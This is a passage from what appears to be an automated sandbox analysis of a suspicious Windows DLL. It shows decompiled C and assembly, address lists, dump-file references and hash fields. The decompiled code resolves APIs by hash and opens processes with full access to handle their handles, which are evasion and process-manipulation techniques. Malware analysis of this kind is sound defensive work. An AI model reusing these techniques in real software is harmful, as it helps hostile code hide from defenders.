				E6E47F4BC( &_v200, E6E47F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v204, E6E47F4CC(_t385) + 0x10);
				E6E47F4BC( &_v208, E6E47F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E484200(0x60a28c5c, _t434);
				E6E47F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E47F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E47F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E47F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E47F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E47F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E47F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E47F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E47F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E47F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E47F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E47F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E47F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E47F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E47F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E47F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E47F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E471D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E47B27C( &_v248, _v256, _t481, _v252, _t318);
				E6E47F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v296, E6E47F4CC(_t410) + 0x10);
				E6E47F4BC( &_v300, E6E47F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v304, E6E47F4CC(_t414) + 0x10);
				E6E47F4BC( &_v308, E6E47F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v312, E6E47F4CC(_t418) + 0x10);
				E6E47F4BC( &_v316, E6E47F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v320, E6E47F4CC(_t422) + 0x10);
				E6E47F4BC( &_v324, E6E47F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E47B9FC(_t154,  *_t480);
				E6E47F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E47F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E47F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E47F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E47F654( &_v316);
				return E6E47F654( &_v356);
			}
















































































                                                                                                        0x6e471494
                                                                                                        0x6e471498
                                                                                                        0x6e47149d
                                                                                                        0x6e4714a3
                                                                                                        0x6e4714ab
                                                                                                        0x6e4714b0
                                                                                                        0x6e4714bc
                                                                                                        0x6e4714c0
                                                                                                        0x6e4714d2
                                                                                                        0x6e4714e8
                                                                                                        0x6e4714f3
                                                                                                        0x6e4714f4
                                                                                                        0x6e4714f5
                                                                                                        0x6e4714f6
                                                                                                        0x6e4714f7
                                                                                                        0x6e4714fa
                                                                                                        0x6e4714fe
                                                                                                        0x6e471502
                                                                                                        0x6e471509
                                                                                                        0x6e47151b
                                                                                                        0x6e471531
                                                                                                        0x6e47153c
                                                                                                        0x6e47153d
                                                                                                        0x6e47153e
                                                                                                        0x6e47153f
                                                                                                        0x6e471540
                                                                                                        0x6e471543
                                                                                                        0x6e471547
                                                                                                        0x6e47154b
                                                                                                        0x6e471552
                                                                                                        0x6e471564
                                                                                                        0x6e47157a
                                                                                                        0x6e471585
                                                                                                        0x6e471586
                                                                                                        0x6e471587
                                                                                                        0x6e471588
                                                                                                        0x6e471589
                                                                                                        0x6e47158c
                                                                                                        0x6e471590
                                                                                                        0x6e471594
                                                                                                        0x6e47159b
                                                                                                        0x6e4715ad
                                                                                                        0x6e4715c3
                                                                                                        0x6e4715ce
                                                                                                        0x6e4715cf
                                                                                                        0x6e4715d0
                                                                                                        0x6e4715d1
                                                                                                        0x6e4715d2
                                                                                                        0x6e4715d5
                                                                                                        0x6e4715d9
                                                                                                        0x6e4715dd
                                                                                                        0x6e4715e4
                                                                                                        0x6e4715f6
                                                                                                        0x6e47160c
                                                                                                        0x6e471617
                                                                                                        0x6e471618
                                                                                                        0x6e471619
                                                                                                        0x6e47161a
                                                                                                        0x6e47161b
                                                                                                        0x6e47161e
                                                                                                        0x6e471622
                                                                                                        0x6e471626
                                                                                                        0x6e47162d
                                                                                                        0x6e47163f
                                                                                                        0x6e471655
                                                                                                        0x6e471660
                                                                                                        0x6e471661
                                                                                                        0x6e471662
                                                                                                        0x6e471663
                                                                                                        0x6e471664
                                                                                                        0x6e471667
                                                                                                        0x6e47166b
                                                                                                        0x6e47166f
                                                                                                        0x6e471676
                                                                                                        0x6e471688
                                                                                                        0x6e47169e
                                                                                                        0x6e4716a9
                                                                                                        0x6e4716aa
                                                                                                        0x6e4716ab
                                                                                                        0x6e4716ac
                                                                                                        0x6e4716ad
                                                                                                        0x6e4716b0
                                                                                                        0x6e4716b4
                                                                                                        0x6e4716b8
                                                                                                        0x6e4716bf
                                                                                                        0x6e4716d1
                                                                                                        0x6e4716e7
                                                                                                        0x6e4716f2
                                                                                                        0x6e4716f3
                                                                                                        0x6e4716f4
                                                                                                        0x6e4716f5
                                                                                                        0x6e4716f6
                                                                                                        0x6e4716f9
                                                                                                        0x6e4716fd
                                                                                                        0x6e471701
                                                                                                        0x6e471708
                                                                                                        0x6e47171a
                                                                                                        0x6e471730
                                                                                                        0x6e47173b
                                                                                                        0x6e47173c
                                                                                                        0x6e47173d
                                                                                                        0x6e47173e
                                                                                                        0x6e47173f
                                                                                                        0x6e471742
                                                                                                        0x6e471746
                                                                                                        0x6e47174a
                                                                                                        0x6e471751
                                                                                                        0x6e471763
                                                                                                        0x6e471779
                                                                                                        0x6e471784
                                                                                                        0x6e471785
                                                                                                        0x6e471786
                                                                                                        0x6e471787
                                                                                                        0x6e471788
                                                                                                        0x6e47178b
                                                                                                        0x6e47178f
                                                                                                        0x6e471793
                                                                                                        0x6e47179a
                                                                                                        0x6e4717ac
                                                                                                        0x6e4717c2
                                                                                                        0x6e4717cd
                                                                                                        0x6e4717ce
                                                                                                        0x6e4717cf
                                                                                                        0x6e4717d0
                                                                                                        0x6e4717d1
                                                                                                        0x6e4717d4
                                                                                                        0x6e4717d8
                                                                                                        0x6e4717dc
                                                                                                        0x6e4717e3
                                                                                                        0x6e4717f5
                                                                                                        0x6e47180b
                                                                                                        0x6e471816
                                                                                                        0x6e471817
                                                                                                        0x6e471818
                                                                                                        0x6e471819
                                                                                                        0x6e47181a
                                                                                                        0x6e47181d
                                                                                                        0x6e471821
                                                                                                        0x6e471825
                                                                                                        0x6e47182c
                                                                                                        0x6e47183e
                                                                                                        0x6e471854
                                                                                                        0x6e47185f
                                                                                                        0x6e471860
                                                                                                        0x6e471861
                                                                                                        0x6e471862
                                                                                                        0x6e471863
                                                                                                        0x6e471866
                                                                                                        0x6e47186a
                                                                                                        0x6e47186e
                                                                                                        0x6e471875
                                                                                                        0x6e471887
                                                                                                        0x6e47189d
                                                                                                        0x6e4718a8
                                                                                                        0x6e4718a9
                                                                                                        0x6e4718aa
                                                                                                        0x6e4718ab
                                                                                                        0x6e4718ac
                                                                                                        0x6e4718af
                                                                                                        0x6e4718b3
                                                                                                        0x6e4718b7
                                                                                                        0x6e4718be
                                                                                                        0x6e4718d0
                                                                                                        0x6e4718e6
                                                                                                        0x6e4718f1
                                                                                                        0x6e4718f2
                                                                                                        0x6e4718f3
                                                                                                        0x6e4718f4
                                                                                                        0x6e4718f5
                                                                                                        0x6e4718f8
                                                                                                        0x6e4718fc
                                                                                                        0x6e471900
                                                                                                        0x6e471907
                                                                                                        0x6e471919
                                                                                                        0x6e47192f
                                                                                                        0x6e47193a
                                                                                                        0x6e47193b
                                                                                                        0x6e47193c
                                                                                                        0x6e47193d
                                                                                                        0x6e47193e
                                                                                                        0x6e471941
                                                                                                        0x6e471945
                                                                                                        0x6e471949
                                                                                                        0x6e471950
                                                                                                        0x6e471962
                                                                                                        0x6e471978
                                                                                                        0x6e471983
                                                                                                        0x6e471984
                                                                                                        0x6e471985
                                                                                                        0x6e471986
                                                                                                        0x6e47198c
                                                                                                        0x6e47198f
                                                                                                        0x6e471991
                                                                                                        0x6e47199c
                                                                                                        0x6e4719a3
                                                                                                        0x6e4719ac
                                                                                                        0x6e4719b4
                                                                                                        0x6e4719bb
                                                                                                        0x6e4719c4
                                                                                                        0x6e4719cc
                                                                                                        0x6e4719d3
                                                                                                        0x6e4719dc
                                                                                                        0x6e4719e4
                                                                                                        0x6e4719eb
                                                                                                        0x6e4719f4
                                                                                                        0x6e4719fc
                                                                                                        0x6e471a03
                                                                                                        0x6e471a0c
                                                                                                        0x6e471a14
                                                                                                        0x6e471a1b
                                                                                                        0x6e471a24
                                                                                                        0x6e471a2c
                                                                                                        0x6e471a36
                                                                                                        0x6e471a3f
                                                                                                        0x6e471a47
                                                                                                        0x6e471a51
                                                                                                        0x6e471a5a
                                                                                                        0x6e471a62
                                                                                                        0x6e471a6c
                                                                                                        0x6e471a75
                                                                                                        0x6e471a7d
                                                                                                        0x6e471a87
                                                                                                        0x6e471a90
                                                                                                        0x6e471a98
                                                                                                        0x6e471aa2
                                                                                                        0x6e471aab
                                                                                                        0x6e471ab3
                                                                                                        0x6e471abd
                                                                                                        0x6e471ac6
                                                                                                        0x6e471ace
                                                                                                        0x6e471ad8
                                                                                                        0x6e471ae1
                                                                                                        0x6e471ae9
                                                                                                        0x6e471af3
                                                                                                        0x6e471afc
                                                                                                        0x6e471b04
                                                                                                        0x6e471b0e
                                                                                                        0x6e471b17
                                                                                                        0x6e471b1f
                                                                                                        0x6e471b26
                                                                                                        0x6e471b2f
                                                                                                        0x6e471b37
                                                                                                        0x6e471b3e
                                                                                                        0x6e471b43
                                                                                                        0x6e471b51
                                                                                                        0x6e471b55
                                                                                                        0x6e471b64
                                                                                                        0x6e471b6d
                                                                                                        0x6e471b72
                                                                                                        0x6e471b79
                                                                                                        0x6e471b7d
                                                                                                        0x6e471b81
                                                                                                        0x6e471b88
                                                                                                        0x6e471b9a
                                                                                                        0x6e471bb0
                                                                                                        0x6e471bbb
                                                                                                        0x6e471bbc
                                                                                                        0x6e471bbd
                                                                                                        0x6e471bbe
                                                                                                        0x6e471bbf
                                                                                                        0x6e471bc2
                                                                                                        0x6e471bc6
                                                                                                        0x6e471bca
                                                                                                        0x6e471bd1
                                                                                                        0x6e471be3
                                                                                                        0x6e471bf9
                                                                                                        0x6e471c04
                                                                                                        0x6e471c05
                                                                                                        0x6e471c06
                                                                                                        0x6e471c07
                                                                                                        0x6e471c08
                                                                                                        0x6e471c0b
                                                                                                        0x6e471c0f
                                                                                                        0x6e471c13
                                                                                                        0x6e471c1a
                                                                                                        0x6e471c2c
                                                                                                        0x6e471c42
                                                                                                        0x6e471c4d
                                                                                                        0x6e471c4e
                                                                                                        0x6e471c4f
                                                                                                        0x6e471c50
                                                                                                        0x6e471c51
                                                                                                        0x6e471c54
                                                                                                        0x6e471c58
                                                                                                        0x6e471c5c
                                                                                                        0x6e471c63
                                                                                                        0x6e471c75
                                                                                                        0x6e471c8b
                                                                                                        0x6e471c96
                                                                                                        0x6e471c97
                                                                                                        0x6e471c98
                                                                                                        0x6e471c99
                                                                                                        0x6e471c9a
                                                                                                        0x6e471c9d
                                                                                                        0x6e471ca0
                                                                                                        0x6e471ca1
                                                                                                        0x6e471ca2
                                                                                                        0x6e471ca9
                                                                                                        0x6e471cac
                                                                                                        0x6e471cb7
                                                                                                        0x6e471cbe
                                                                                                        0x6e471cc7
                                                                                                        0x6e471ccf
                                                                                                        0x6e471cd6
                                                                                                        0x6e471cdf
                                                                                                        0x6e471ce7
                                                                                                        0x6e471cee
                                                                                                        0x6e471cf7
                                                                                                        0x6e471cff
                                                                                                        0x6e471d04
                                                                                                        0x6e471d0d
                                                                                                        0x6e471d15
                                                                                                        0x6e471d2a

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8nsK
                                                                                                        • API String ID: 0-3012451157
                                                                                                        • Opcode ID: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                        • Instruction ID: e1c55d9591ecf8e7590ef669fc239753d3cc2ce03a86c13a7869252d1ec07354
                                                                                                        • Opcode Fuzzy Hash: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                        • Instruction Fuzzy Hash: DE3262724146069BCB35DF70CC519EF77A4AFA1208F204F1EF5895A1A2FF71A98AC6C1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E47A4E8, Relevance: 1.8, Strings: 1, Instructions: 537COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E6E47A4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E47B658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E47F4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E47F654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E482234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E47F654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E47F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E47F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e48b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E483064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E47B5C4(_t439 + 0x34);
											E6E47B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E47B5C4(_t439 + 0x34);
										E6E47B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E47F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E47CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E47C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E47F828(_t439 + 0x14, E6E47F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E47F4BC(_t439 + 0x14, E6E47F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E483064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E47F828(_t439 + 0x40, E6E47F4CC(_t439 + 0x3c) + 4);
											 *(E6E47F4BC(_t439 + 0x40, E6E47F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E47CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E47F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E47AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E47CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E4838F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E47F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E47F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E4838F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E47F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E47F4BC( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 4);
								 *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E47F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E483064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E47F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E47F4BC( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E47F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 4);
										 *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E47F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E47F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E47F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E47F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E4838F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E47F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E47F828( *((intOrPtr*)(_t439 + 4)), E6E47F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E483064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E47F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E47F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
